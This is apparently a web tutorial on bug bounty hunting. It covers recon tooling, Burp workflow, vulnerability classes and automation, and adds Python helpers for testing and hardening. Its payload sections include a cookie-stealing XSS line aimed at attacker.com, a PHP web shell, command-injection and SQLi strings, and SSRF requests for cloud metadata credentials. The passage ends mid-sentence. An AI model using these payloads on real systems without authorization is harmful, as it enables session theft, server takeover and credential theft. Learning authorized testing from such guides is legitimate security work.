🎯

Bug Bounty Hunting v2.0

Bug Bounty Hunting — Complete Guide

From understanding the platforms to recon, finding bugs, writing reports, submitting them and getting paid: the complete journey in one place.

hunter@bb:~$ whoami
bug_bounty_hunter
hunter@bb:~$ cat mission.txt
Find Target → Hunt Bug → Write Report → Get Paid 💰
hunter@bb:~$
🔍 Reconnaissance 🐛 Bug Hunting 💉 XSS / SQLi 🔓 IDOR 📡 SSRF 📝 Report Writing 📤 Submission 💰 Bounty 🏆 Hall of Fame 🤖 Automation
📋 Table of Contents — Full List
01 What is Bug Bounty & Why Do It?
History, how it works, who does it
Legal and ethical aspects, responsible disclosure
02 Before You Start — Prerequisites & Setup
What to learn, which skills are needed
Environment Setup — Kali, Burp Suite, Tools
03 Platform Overview & Choosing Programs
HackerOne, Bugcrowd, Intigriti, YesWeHack, Synack
Private vs Public Programs, VDP vs Paid
04 Reconnaissance — Information Gathering
Passive Recon: WHOIS, Google Dorks, Shodan, crt.sh
Active Recon: Subdomain Enumeration, Port Scanning
Directory Bruteforce, JS File Analysis, API Endpoint Discovery
05 Bug Hunting Methodology
Where do bugs live? Understanding the attack surface
Proxy Setup, Request Manipulation, Parameter Tampering
06 Common Vulnerabilities
XSS, SQL Injection, IDOR, SSRF, Open Redirect, CSRF
LFI/RFI, XXE, RCE, Broken Auth, Business Logic Flaws
07 Tools & Automation
Burp Suite, ffuf, subfinder, httpx, nuclei, amass
dalfox, sqlmap, gau, waybackurls, gf, hakrawler
08 How to Write a Bug Report
Characteristics of good reports, what gets you triaged quickly
CVSS Score, Severity Rating, Impact Statement
09 Report Structure — Complete Template
Title, Summary, Steps to Reproduce, Impact, PoC, Remediation
Examples with screenshots, video and payloads
10 Submission Process — How to Submit
Step-by-step submission on HackerOne and Bugcrowd
Avoiding duplicates, checking scope
11 Triage, Communication & Negotiation
What triage is; N/A vs Informative vs Duplicate
How to negotiate a bounty
12 Getting Paid, Payment & Hall of Fame
PayPal, Bank Transfer, Swag, CVE
Receiving bounties from Bangladesh
13 Advanced Techniques & Tips
Chained Bugs, Business Logic, GraphQL Testing, OAuth Flaws
Rate Limiting Bypass, Race Conditions, 2FA Bypass
14 Career Path, Resources & Cheat Sheet
PortSwigger Web Security Academy, HackTheBox, TryHackMe
Complete Cheat Sheet & Quick Reference
Chapter 01
🎯 What is Bug Bounty & Why Do It?
History, how it works, who does it, and how much you can earn

🐛 What is Bug Bounty?

A bug bounty is a program in which a company rewards researchers (hackers) for finding security vulnerabilities in its software, websites or applications. In practice it is an attempt to hack the company's systems with its permission, which makes it a form of ethical hacking. It differs from a classic penetration test in that the company pays per valid, reproducible finding rather than for a fixed engagement.

💡 Simply put
Imagine Google says: "Find a security hole in our website and we'll pay you $10,000." You find one and report it. That is a bug bounty.

📜 History

Year   Event
1995   Netscape launches the first bug bounty program
2004   Mozilla launches its bug bounty ($500 per bug)
2010   Google starts its own program (Chromium first, then its web properties); Facebook follows in 2011
2012   HackerOne and Bugcrowd are founded as dedicated bug bounty platforms
2022+  Cumulative bounties paid across the platforms reach into the hundreds of millions of dollars

💰 How Much Can You Earn?

🥉 Beginner

$50–$500

Low/Medium severity bugs, VDP programs

🥈 Intermediate

$500–$10,000

High severity bugs, private programs

🥇 Expert

$10K–$1M+

Critical bugs, RCE, zero-days, Big Tech programs

⚖️ Legal & Ethical Aspects

🚨 Critical Warning
Only work on authorized programs. Testing a system without permission is a crime in most jurisdictions, whatever your intent. Always read the program's scope and safe-harbor policy carefully before sending a single request.

What You Can Do

  • Test within the program scope
  • Prove a vulnerability without extracting data (use your own test accounts and the minimum proof needed)
  • Follow responsible disclosure
  • Don't disclose publicly before the fix, and only with the program's agreement

What You Cannot Do

  • Attack assets outside the scope
  • Access or take real user data
  • Conduct DoS/DDoS attacks
  • Conduct social engineering against employees or users

🎯 Chapter Summary

  • 💡 Bug Bounty = hacking with permission and getting rewarded for it
  • 💰 From beginner to expert, earnings from $50 to $1M+ are possible
  • ⚖️ Always stay within scope and keep the legal side in mind
Chapter 02
🛠️ Before You Start — Prerequisites & Setup
What to learn, which tools are needed, how to set up your environment

📚 What You Must Learn (Roadmap)

1
Build Your Foundation
Learn these topics thoroughly first
HTTP/HTTPS HTML/JS Basics Linux CLI Networking Basics Cookie & Session
2
Learn the Tools
Essential tools for bug bounty
Burp Suite nmap ffuf subfinder nuclei
3
Learn the Vulnerabilities
OWASP Top 10 and the common bug classes
XSS SQLi IDOR SSRF CSRF RCE
4
Practice & Start Hunting
Practice in labs first, then move to real programs
PortSwigger Labs HackTheBox TryHackMe Real Programs

💻 Environment Setup

Kali Linux Setup

# Update Kali Linux
sudo apt update && sudo apt upgrade -y

# Install essential tools (httpx-toolkit is Kali's package name for ProjectDiscovery httpx)
sudo apt install -y nmap subfinder httpx-toolkit nuclei ffuf \
  amass gobuster feroxbuster curl wget git python3-pip golang-go

# Go-based tools, latest upstream builds (requires Go; add $(go env GOPATH)/bin to your PATH)
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install github.com/tomnomnom/gf@latest
go install github.com/lc/gau/v2/cmd/gau@latest

# Update the nuclei templates
nuclei -update-templates

Burp Suite Setup

🔧 Burp Suite Community (Free)
Burp Suite Community Edition is free. Professional Edition is a paid yearly license that adds the active scanner, an unthrottled Intruder and Pro-only extensions. Community is enough to start with.
1
Download Burp Suite
from portswigger.net/burp/communitydownload
2
Configure the Browser Proxy
Set the browser proxy to 127.0.0.1:8080. The FoxyProxy extension makes switching easy; alternatively use Burp's built-in browser, which is already configured.
3
Install the CA Certificate
With the proxy on, open http://burp, download the CA certificate and import it into the browser's trusted authorities. HTTPS traffic will then be readable in Burp.

🛠️ Chapter Summary

  • 📚 HTTP, HTML, Linux, Networking: learn these first
  • 🔧 Burp Suite + Kali Linux = the core bug bounty setup
  • 🎯 Practice on PortSwigger Labs to learn fast
Chapter 03
🌐 Platform Overview & Choosing Programs
All major platforms including HackerOne and Bugcrowd, and strategies for finding the right program

🏆 Major Bug Bounty Platforms

Platform         URL                Features                                                    Best For
HackerOne        hackerone.com      Largest, most programs                                      Everyone
Bugcrowd         bugcrowd.com       Big-company programs                                        Intermediate
Intigriti        intigriti.com      Europe-based, good bounties                                 Intermediate
YesWeHack        yeswehack.com      European focus, growing                                     Beginner
Synack           synack.com         Vetted researchers only                                     Expert
Open Bug Bounty  openbugbounty.org  Free; coordinated disclosure for sites with no program     Beginner

🎯 Strategy for Choosing Programs

Good Programs for Beginners

  • 💰 Doesn't pay big, but you learn
  • 🔓 Wide scope (more domains, more attack surface)
  • ⏰ New program (fewer duplicates)
  • 📱 Mobile app programs
  • 🏷️ Public and VDP programs

Avoid at the Start

  • 🏛️ Google, Apple, Microsoft (very high competition)
  • 🔒 Private programs (invitation only)
  • 💳 Financial/banking programs (high risk, strict rules)
  • ⛔ Narrow-scope programs

📋 Understanding Program Scope

📌 What is Scope?
Scope is the set of domains or assets you are permitted to test. Going out of scope invalidates your report and may get you into legal trouble.
# HackerOne program scope example
IN SCOPE (may be tested):
  *.example.com                # all subdomains
  api.example.com              # API
  mobile app (Android/iOS)

OUT OF SCOPE (must not be tested):
  blog.example.com             # separate platform
  cdn.example.com              # CDN
  *.third-party.com            # third-party services
  DoS/DDoS attacks
  Social engineering

🆚 VDP vs Paid Program

                 VDP (Vulnerability Disclosure)    Paid Bug Bounty
Reward           Hall of Fame or swag only          Cash bounty ($50–$1M+)
Competition      Lower                              Higher
Learning         Good                               Good
For beginners    Perfect                            After learning the basics

🌐 Chapter Summary

  • 🏆 HackerOne and Bugcrowd are the best places to start
  • 🎯 Start with wide-scope programs, new programs and VDPs
  • 📋 Always read the scope carefully
Chapter 04
🔍 Reconnaissance — Information Gathering
The more you know about the target, the higher your chance of finding bugs

🗺️ Recon Pipeline — What to Do

TARGET (example.com)
│
├─── Passive Recon (no traffic sent to the target; only third-party sources are queried)
│    ├── WHOIS, DNS lookup
│    ├── Google Dorks
│    ├── Shodan / Censys
│    ├── crt.sh (TLS certificates)
│    ├── waybackurls (old URLs)
│    └── GitHub Recon (leaked secrets)
│
└─── Active Recon (direct requests to the target; must be within scope)
     ├── Subdomain Enumeration (subfinder queries sources passively; amass brute-force mode is active)
     ├── Port Scanning (nmap)
     ├── HTTP Probing (httpx)
     ├── Directory Bruteforce (ffuf, gobuster)
     ├── JS File Analysis
     └── API Endpoint Discovery

🔎 Passive Recon Techniques

Google Dorks

# Google dorks for collecting information about the target
site:example.com                         # all indexed pages
site:example.com filetype:pdf            # PDF files
site:example.com inurl:admin             # admin panels
site:example.com inurl:login             # login pages
site:example.com ext:php inurl:id=       # PHP pages with an id parameter
site:example.com "api_key"               # leaked API keys
site:github.com "example.com" password   # leaked credentials in public repos

Subdomain Enumeration

# With subfinder
subfinder -d example.com -o subdomains.txt

# With amass (slower, but finds more)
amass enum -d example.com -o amass_results.txt

# From crt.sh (certificate transparency). name_value may contain several names
# separated by newlines, so print raw strings with -r and strip wildcards.
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/^\*\.//' | sort -u

# Merge the results and check which hosts are live with httpx
cat subdomains.txt amass_results.txt | sort -u | httpx -silent -o live_hosts.txt

# Example output (httpx run with -status-code -title -tech-detect)
https://api.example.com [200] [API Gateway] [nginx]
https://admin.example.com [200] [Admin Panel] [Apache]
https://dev.example.com [200] [Development Site]
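The jq one-liner above hides two traps: crt.sh packs several hostnames into one name_value field separated by newlines, and a query for %.example.com also returns look-alike names such as example.com.evil.net. The following Python helper, an added example that is not part of the original guide, does the same extraction with those cases handled. The JSON it parses is a constructed sample in the shape crt.sh returns, not a real response.

```python
import json
import re

# Constructed sample in the shape of crt.sh's ?q=%25.example.com&output=json response
# (not real certificate data): newline-separated names, a wildcard, mixed case,
# a duplicate and a look-alike domain that is NOT in scope.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "api.example.com\nwww.example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "*.example.com"},
    {"issuer_name": "C=US, O=DigiCert",      "name_value": "Dev.Example.com"},
    {"issuer_name": "C=US, O=DigiCert",      "name_value": "api.example.com"},
    {"issuer_name": "C=US, O=DigiCert",      "name_value": "example.com.evil.net"},
])

# RFC 1123 hostname: labels of letters, digits and hyphens, at least two labels
HOSTNAME_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+$"
)


def crtsh_subdomains(raw_json, domain):
    """Return the sorted, de-duplicated list of hostnames from a crt.sh JSON
    response that are the apex or a true subdomain of `domain`."""
    found = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            # normalise case and drop a leading wildcard ("*.example.com" -> "example.com")
            name = name.strip().lower().lstrip("*.")
            if not name or not HOSTNAME_RE.match(name):
                continue
            # scope check: "example.com.evil.net" ends with neither ".example.com" nor equals it
            if name == domain or name.endswith("." + domain):
                found.add(name)
    return sorted(found)


if __name__ == "__main__":
    for host in crtsh_subdomains(SAMPLE_CRTSH_JSON, "example.com"):
        print(host)
```

Feed the output straight into httpx as in the shell pipeline above; the scope filter is the part worth keeping, because certificate transparency logs are full of names that merely contain the target string.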

Port Scanning

# Port scan with nmap (check that the program allows port scanning; --min-rate 5000 is noisy)
nmap -sV -sC -p- --min-rate 5000 example.com

# Focus on web ports
nmap -p 80,443,8080,8443,8888 -sV example.com

# Common open ports that are interesting
21    → FTP (anonymous login check)
22    → SSH (weak-credential checks only if the program explicitly allows them)
80    → HTTP
443   → HTTPS
3306  → MySQL (exposed DB!)
6379  → Redis (unauthenticated access)
27017 → MongoDB (exposed DB!)

Directory & File Bruteforce

# Directory bruteforce with ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
     -u https://example.com/FUZZ \
     -mc 200,301,302,403

# With gobuster
gobuster dir -u https://example.com \
    -w /usr/share/wordlists/dirb/common.txt \
    -x php,html,js,txt

# API endpoint discovery
ffuf -w wordlists/api_endpoints.txt \
     -u https://api.example.com/FUZZ \
     -H "Content-Type: application/json"

JavaScript File Analysis

# Collect every JS URL with gau
echo "example.com" | gau | grep "\.js$" | sort -u > js_files.txt

# Pull absolute URLs (API hosts, endpoints) out of the JS files
cat js_files.txt | xargs -I{} curl -s {} | grep -Eo '(http|https)://[^"]+' | sort -u

# Download the files locally, then grep them for secrets
mkdir -p js_files && wget -q -P js_files -i js_files.txt
grep -rEi "api_key|apikey|secret|password|token" js_files/
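The grep above finds keywords; a hunter usually wants two separate lists, the endpoints a bundle talks to and any credential-shaped strings in it. The following Python script is an added example, not code from the original guide. The JavaScript it scans is a constructed fragment; the AWS and Stripe keys in it are the documentation placeholder values those vendors publish, not live secrets.

```python
import re

# Constructed JavaScript bundle fragment (not from any real site). The key values
# are the public documentation examples from AWS and Stripe.
SAMPLE_JS = r"""
const API_BASE = "https://api.example.com/v2";
fetch(API_BASE + "/users/me", {headers: {Authorization: "Bearer " + token}});
axios.post("/internal/admin/export", data);
var cfg = {awsKey: "AKIAIOSFODNN7EXAMPLE", stripe: "sk_test_4eC39HqLyjWDarjtT1zdp7dc"};
const legacy = 'http://legacy.example.com/api/v1/invoices?id=';
var auth = {password: "Summ3rIsH0t!2024"};
"""

# Quoted absolute URLs or root-relative paths
ENDPOINT_RE = re.compile(r"""["'](https?://[^"'\s]+|/[a-zA-Z0-9_./-]+)["']""")

# Provider-specific formats first (high signal), then a generic key=value catch-all
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "stripe_secret":  re.compile(r"\bsk_(?:live|test)_[0-9a-zA-Z]{24,}\b"),
    "generic_secret": re.compile(
        r"""(?i)\b(api[_-]?key|secret|password|token)\b\s*[:=]\s*["']([^"']{8,})["']"""
    ),
}


def extract_endpoints(js):
    """Unique, sorted list of URLs and paths referenced in the JavaScript."""
    return sorted({m.group(1) for m in ENDPOINT_RE.finditer(js)})


def extract_secrets(js):
    """List of (pattern_name, matched_text) for every credential-shaped string."""
    hits = []
    for label, pattern in SECRET_PATTERNS.items():
        for m in pattern.finditer(js):
            hits.append((label, m.group(0)))
    return hits


if __name__ == "__main__":
    print("endpoints:", *extract_endpoints(SAMPLE_JS), sep="\n  ")
    print("secrets:", *extract_secrets(SAMPLE_JS), sep="\n  ")
```

Run it over the files in js_files/ with a small loop; the endpoint list feeds the API-discovery wordlist, and every secret hit must be verified (many are placeholders) before it goes in a report.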
⚠️ GitHub Recon
Search GitHub for the company's leaked secrets: API keys, passwords and database credentials often sit in public repositories or old commits.
# Search GitHub (as Google dorks, or directly in GitHub code search)
site:github.com "example.com" "api_key"
site:github.com "example.com" "password"
site:github.com "example.com" "secret"
site:github.com "example.com" ".env"

# Scan a repository's full history with trufflehog
trufflehog github --repo=https://github.com/examplecorp/repo

🔍 Chapter Summary

  • 🗺️ Recon = Passive (no contact with the target) + Active (direct requests)
  • 🔎 Google Dorks → Subdomains → Port Scan → Directory Brute → JS Analysis
  • 💡 GitHub recon often hands you an API key directly!
Chapter 05
🐛 Bug Hunting Methodology
Where bugs live, how to find them, and how to work with Burp Suite

🎯 Understanding the Attack Surface — Where Do Bugs Live?

🌐 In Web Applications

  • Login / Registration Form
  • Search Box (XSS, SQLi)
  • File Upload Feature
  • Password Reset Flow
  • Profile Edit Page
  • Comment / Feedback Box
  • Payment / Checkout

🔌 In APIs

  • REST API Endpoints
  • GraphQL Queries
  • User ID manipulation (IDOR)
  • Unauthenticated endpoints
  • HTTP Method tampering
  • JWT Token flaws
  • API versioning issues (an old /v1/ endpoint often lacks the checks added to /v2/)

🔧 Working with Burp Suite

Intercepting & Modifying HTTP Requests

1
Turn on Intercept
Burp → Proxy → Intercept → ON
2
Perform an Action in the Browser
Log in or submit a form; the request is captured in Burp
3
Modify the Request
Change parameters, inject payloads, then Forward
4
Use Repeater / Intruder
Right-click the request → Send to Repeater. Use Repeater for repeated manual testing and Intruder for payload lists.

🧪 Parameter Tampering — Most Bugs Are Here

# Normal request
GET /profile?user_id=1001 HTTP/1.1
Host: example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...

# IDOR test: swap in another user's ID (use a second account you own, never a stranger's)
GET /profile?user_id=1002 HTTP/1.1     ← other user's data visible? = IDOR bug!
GET /profile?user_id=0 HTTP/1.1        ← admin profile?
GET /profile?user_id=-1 HTTP/1.1       ← negative ID?
GET /profile?user_id=null HTTP/1.1     ← null value?

# Hunting hidden parameters (mass assignment)
POST /login HTTP/1.1
{"username":"admin","password":"pass","role":"admin"}   ← inject a parameter the form never sends

🐛 Chapter Summary

  • 🎯 Login, search, upload and API endpoints hold the most bugs
  • 🔧 Burp Suite's Intercept + Repeater is the bug hunter's most powerful weapon
  • 🧪 Manipulate every parameter and watch how the response changes
Chapter 06
💉 Common Vulnerabilities
XSS, SQLi, IDOR, SSRF, CSRF, RCE: each bug class in detail

🔴 XSS — Cross-Site Scripting

📌 What?

The attacker's JavaScript executes in another user's browser.

⚠️ Impact

Cookie theft, session hijacking, phishing, keylogging, actions performed as the victim

# Reflected XSS test payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
"><script>alert(document.domain)</script>
<body onload=alert(1)>

# Stored XSS: insert into a comment box. The exfiltration payload below is shown for
# illustration; in a report, prove execution with alert(document.domain) against a
# second account you own rather than stealing anyone's cookies.
<script>document.location='http://attacker.com/?c='+document.cookie</script>

# DOM XSS via the URL fragment (never sent to the server, so WAFs don't see it)
https://example.com/#<img src=x onerror=alert(1)>

# WAF bypass payloads
<ScRiPt>alert(1)</ScRiPt>
<sc<script>ript>alert(1)</script>
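Before firing the payload list, a hunter stores a harmless canary followed by the four HTML meta-characters and checks whether they come back raw; that tells you which contexts (element text, quoted attribute) you can break out of. The Python below is an added example, not code from the guide: a constructed profile template rendered once without encoding (the stored-XSS bug) and once with context-safe encoding (the fix the report template later recommends), plus that canary check run against both.

```python
import html

# Constructed stand-in for a profile page template; not the guide's or any real site's code.
# The bio is rendered twice: as element text and inside a double-quoted attribute.
TEMPLATE = (
    '<h1>{name}</h1>'
    '<div class="bio">{bio}</div>'
    '<a href="/u/{name}" title="{bio}">link</a>'
)

# The characters that let input escape its HTML context: tag, attribute value (both quote styles)
PROBE_CHARS = '<>"\''


def render_vulnerable(name, bio):
    """Interpolates user input into HTML as-is: this is the stored XSS."""
    return TEMPLATE.format(name=name, bio=bio)


def render_hardened(name, bio):
    """Encodes & < > " ' so the input is displayed as text in both element and attribute context."""
    return TEMPLATE.format(
        name=html.escape(name, quote=True),
        bio=html.escape(bio, quote=True),
    )


def reflection_report(render, canary="zqx7bb"):
    """Canary probe: store canary+metacharacters, then count how many times the canary is
    reflected and how many of those reflections keep the meta-characters unencoded.
    `render` stands in for the HTTP round trip you would do through Burp Repeater."""
    body = render("tester", canary + PROBE_CHARS)
    return {
        "reflections": body.count(canary),
        "unencoded": body.count(canary + PROBE_CHARS),
    }


if __name__ == "__main__":
    print("vulnerable:", reflection_report(render_vulnerable))
    print("hardened:  ", reflection_report(render_hardened))
```

An "unencoded" count above zero means a payload from the list above will execute in that spot; zero means HTML encoding is in place and you should move on to other contexts (JavaScript strings, URL attributes, DOM sinks), which html.escape does not protect.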

🔴 SQL Injection

# Basic SQLi test strings
' OR '1'='1
' OR '1'='1'--
" OR "1"="1
admin'--
1' ORDER BY 1--
1' UNION SELECT NULL--

# Automated testing with sqlmap (check the program allows automated scanners; keep --dump to your own rows)
sqlmap -u "https://example.com/item?id=1" --dbs
sqlmap -u "https://example.com/item?id=1" -D database_name --tables
sqlmap -u "https://example.com/item?id=1" -D db -T users --dump

# Against a POST request
sqlmap -u "https://example.com/login" \
       --data="username=admin&password=test" \
       --dbs

🔴 IDOR — Insecure Direct Object Reference

💡 IDOR is the bug class reported most often in bug bounty!
If changing a User ID, Order ID, File ID or similar reference lets you view or modify someone else's data, that is IDOR. Always test with two accounts you own, so the "other user" is yours.
# IDOR test examples
GET /api/invoice/1234        → try 1235, 1236, ... (sequential IDs)
GET /download?file=user1.pdf → try user2.pdf
DELETE /api/comment/5678     → can you delete another user's comment?

# Test even when IDs are UUIDs/GUIDs (they often leak elsewhere, e.g. in profile pages or JS)
GET /api/profile/550e8400-e29b-41d4-a716-446655440000

# HTTP method tampering
GET → POST, PUT, DELETE      # the authorization check is sometimes only on one method

# Horizontal vs vertical IDOR
Horizontal: same role, another user's data (user1 → user2)
Vertical:   user → admin data (more critical!)
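The parameter-tampering requests in chapter 05 and the IDOR checks above are one procedure: fetch the same object with two sessions you own and compare. The Python below is an added example, not code from the guide. It contains a constructed toy backend (an in-memory invoice store with a vulnerable lookup and a fixed one) and a differential probe; in real hunting the `fetch` callable would wrap the two Burp-captured sessions and issue real HTTP requests.

```python
# Constructed toy backend standing in for /api/invoice/<id>; not real data or code.
INVOICES = {
    1234: {"owner": "alice", "total": 120.0},
    1235: {"owner": "bob",   "total": 89.5},
    1236: {"owner": "bob",   "total": 15.0},
}
SESSIONS = {"tokA": "alice", "tokB": "bob"}   # session token -> user


def vulnerable_get_invoice(token, invoice_id):
    """Looks the object up by ID only and never checks who owns it: the IDOR."""
    user = SESSIONS.get(token)
    if user is None:
        return 401, None
    inv = INVOICES.get(invoice_id)
    return (200, inv) if inv else (404, None)


def fixed_get_invoice(token, invoice_id):
    """Same lookup, but the record must belong to the caller."""
    user = SESSIONS.get(token)
    if user is None:
        return 401, None
    inv = INVOICES.get(invoice_id)
    if inv is None or inv["owner"] != user:
        return 404, None          # 404, not 403, so valid IDs cannot be enumerated
    return 200, inv


def idor_probe(fetch, attacker_token, victim_token, victim_ids):
    """Differential test. For each object the victim owns, fetch it with the victim's
    session (ground truth) and with the attacker's session. Report the IDs where the
    attacker gets the identical 200 response; a 404/403 or a different body is not IDOR."""
    leaked = []
    for obj_id in victim_ids:
        v_status, v_body = fetch(victim_token, obj_id)
        a_status, a_body = fetch(attacker_token, obj_id)
        if v_status == 200 and a_status == 200 and a_body == v_body:
            leaked.append(obj_id)
    return leaked


if __name__ == "__main__":
    print("vulnerable backend leaks:", idor_probe(vulnerable_get_invoice, "tokA", "tokB", [1235, 1236]))
    print("fixed backend leaks:     ", idor_probe(fixed_get_invoice, "tokA", "tokB", [1235, 1236]))
```

Comparing bodies rather than just status codes matters: some applications return 200 with an empty or redacted object for foreign IDs, which is not a finding.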

🔴 SSRF — Server-Side Request Forgery

# SSRF test: make the server fetch internal addresses
url=http://127.0.0.1/admin
url=http://localhost/
url=http://169.254.169.254/latest/meta-data/   # AWS instance metadata (IMDSv1)
url=http://192.168.1.1/                         # internal network

# SSRF filter bypass techniques
http://0x7f000001/      # hex notation of 127.0.0.1
http://2130706433/      # decimal notation of 127.0.0.1
http://[::1]/           # IPv6 localhost
http://localtest.me/    # public domain that resolves to 127.0.0.1

# SSRF to AWS credentials (IMDSv1 only; IMDSv2 first needs a PUT to obtain a token, which most SSRF cannot issue)
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# In a report, show that the role name is reachable; never use the returned credentials.
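Every bypass in the list above works because the filter compares strings while the HTTP client parses the host like inet_aton does. The Python below is an added example, not code from the guide: a URL guard that normalises hex, decimal, octal, short-dotted, IPv6 and IPv4-mapped forms before deciding, with a pluggable resolver so a name such as localtest.me is judged by the address it resolves to. It is useful on both sides: a hunter can feed it candidate payloads to see which spellings a naive filter would miss, and a developer can use it as the fix.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# One dotted-quad part as inet_aton accepts it: decimal, octal (leading 0) or hex (0x...)
PART_RE = re.compile(r"^(0x[0-9a-fA-F]+|[0-9]+)$")


def _int_part(s):
    s = s.lower()
    if s.startswith("0x"):
        return int(s, 16)
    if len(s) > 1 and s.startswith("0"):
        return int(s, 8)
    return int(s, 10)


def parse_ipv4_legacy(host):
    """Parse IPv4 the way inet_aton (and therefore curl, PHP and many backends) does:
    1 to 4 parts, the last part filling the remaining bytes. 127.1, 0x7f000001,
    2130706433 and 0177.0.0.1 all become 127.0.0.1. Returns None for any other form."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(PART_RE.match(p) for p in parts):
        return None
    try:
        vals = [_int_part(p) for p in parts]
    except ValueError:               # e.g. "08" is not valid octal
        return None
    last = vals.pop()
    if any(v > 255 for v in vals) or last >= 256 ** (4 - len(vals)):
        return None
    n = 0
    for v in vals:
        n = (n << 8) | v
    n = (n << (8 * (4 - len(vals)))) | last
    return ipaddress.IPv4Address(n)


def canonical_ip(host):
    """Any spelling of an IP literal -> ipaddress object; a DNS name -> None."""
    ip = parse_ipv4_legacy(host)
    if ip is not None:
        return ip
    try:
        return ipaddress.ip_address(host)   # plain IPv6, including ::ffff:127.0.0.1
    except ValueError:
        return None


def is_internal(ip):
    ip = getattr(ip, "ipv4_mapped", None) or ip    # unwrap IPv4-mapped IPv6
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def ssrf_verdict(url, resolver=None):
    """'block' if the URL would reach an internal or cloud-metadata address, else 'allow'.
    `resolver(hostname)` returns the IP strings the name resolves to; without one,
    DNS names are blocked because they cannot be vetted."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "block"                       # file://, gopher://, dict:// are never needed
    ip = canonical_ip(parts.hostname)
    if ip is None:
        if resolver is None:
            return "block"
        addrs = [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
        return "block" if any(is_internal(a) for a in addrs) else "allow"
    return "block" if is_internal(ip) else "allow"


if __name__ == "__main__":
    for u in ["http://0x7f000001/", "http://127.1/", "http://[::1]/",
              "http://169.254.169.254/latest/meta-data/", "https://example.com/"]:
        print(u, "->", ssrf_verdict(u, resolver=lambda h: ["93.184.216.34"]))
```

Two caveats a triager will raise against any guard like this: the resolved address must be pinned for the actual connection (otherwise DNS rebinding answers the check with a public IP and the fetch with 127.0.0.1), and every HTTP redirect must be re-checked, since a 302 to http://169.254.169.254/ bypasses a check done only on the initial URL.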

🔴 CSRF — Cross-Site Request Forgery

# CSRF test HTML (if the victim opens it while logged in, the action runs in their account)
<html>
  <body onload="document.forms[0].submit()">
    <form method="POST" action="https://example.com/change-email">
      <input type="hidden" name="email" value="attacker@evil.com">
    </form>
  </body>
</html>

# CSRF token bypass checks
1. Remove the token parameter entirely
2. Send an empty token value
3. Reuse a valid token from another account you own
4. Change the token's length or a single character
# Also check the session cookie's SameSite attribute: Lax or Strict blocks this cross-site POST
# in modern browsers, and most programs treat CSRF on cookies with SameSite as Informative.

🔴 RCE — Remote Code Execution (Highest Severity)

🚨 Critical — $10,000 to $1,000,000+
RCE means commands can be executed directly on the server. It is the most serious bug class in bug bounty and pays the most. Prove it with a harmless command such as id or hostname; never drop a persistent shell on a production system you do not own.
# Command injection test payloads (append to a parameter that reaches a shell)
; ls -la
| whoami
&& cat /etc/passwd
$(id)
`id`

# File upload RCE (PHP web shell)
shell.php       → <?php system($_GET['cmd']); ?>
shell.php.jpg   (extension bypass)

# Deserialization RCE; Server-Side Template Injection (SSTI)
{{7*7}}        # 49 in the response means the template engine evaluated the expression
${7*7}
<%= 7*7 %>

📊 Vulnerability Severity Table (typical ranges; every program sets its own)

Vulnerability                                Severity      Avg Bounty     Frequency
RCE, SQLi (auth bypass)                      🔴 Critical   $10K–$1M+      ⭐⭐
SSRF, XXE, IDOR (sensitive data), SQLi       🟠 High       $1K–$10K       ⭐⭐⭐
XSS (stored), CSRF, Broken Auth              🟡 Medium     $200–$1K       ⭐⭐⭐⭐
XSS (reflected), Open Redirect               🟢 Low        $50–$200       ⭐⭐⭐⭐⭐
Info Disclosure, Security Headers            🔵 Info       $0–$50/Swag    ⭐⭐⭐⭐⭐

💉 Chapter Summary

  • 🥇 IDOR is the most common class: test every ID parameter
  • 💰 RCE pays the highest bounties
  • 🎯 XSS is the easiest to learn, so start with it
Chapter 07
🤖 Tools & Automation
The best tools for bug bounty, and using automation to work faster

🧰 Essential Tools List

Tool        Category  Use                                Command
Burp Suite  Proxy     HTTP intercept, modify, replay     burpsuite
subfinder   Recon     Subdomain discovery                subfinder -d target.com
httpx       Recon     Live host check                    httpx -l hosts.txt
nuclei      Scanner   Template-based vulnerability scan  nuclei -u target.com
ffuf        Fuzzer    Directory/parameter bruteforce     ffuf -w list.txt -u URL/FUZZ
dalfox      XSS       Automatic XSS scanner              dalfox url "https://target.com?q=1"
sqlmap      SQLi      SQL injection scanner              sqlmap -u "URL?id=1"
gau         Recon     Collect Wayback URLs               gau target.com
amass       Recon     Deep subdomain enumeration         amass enum -d target.com
gf          Filter    URL pattern matching               gau target.com | gf xss

Automation Pipeline — All in One Command

#!/bin/bash
# Bug bounty automation script: subdomains -> live hosts -> nuclei -> XSS
# Only run this against programs that allow automated scanning.
set -u
TARGET="${1:?usage: $0 target.com}"
echo "[+] Starting recon for: $TARGET"

# Step 1: subdomain enumeration and live host check
subfinder -d "$TARGET" -silent | httpx -silent -o "live_${TARGET}.txt"
echo "[+] Live hosts: $(wc -l < "live_${TARGET}.txt")"

# Step 2: nuclei scan
nuclei -l "live_${TARGET}.txt" \
       -t ~/nuclei-templates/ \
       -severity medium,high,critical \
       -o "nuclei_${TARGET}.txt"

# Step 3: URL collection and XSS test
cat "live_${TARGET}.txt" | gau | gf xss | dalfox pipe -o "xss_${TARGET}.txt"

echo "[+] Done! Check the *_${TARGET}.txt files"

🔍 Automated Scanning with Nuclei

# Scan with one template category. Paths are relative to the templates directory;
# current template releases keep web templates under http/ (e.g. -t http/cves/), so
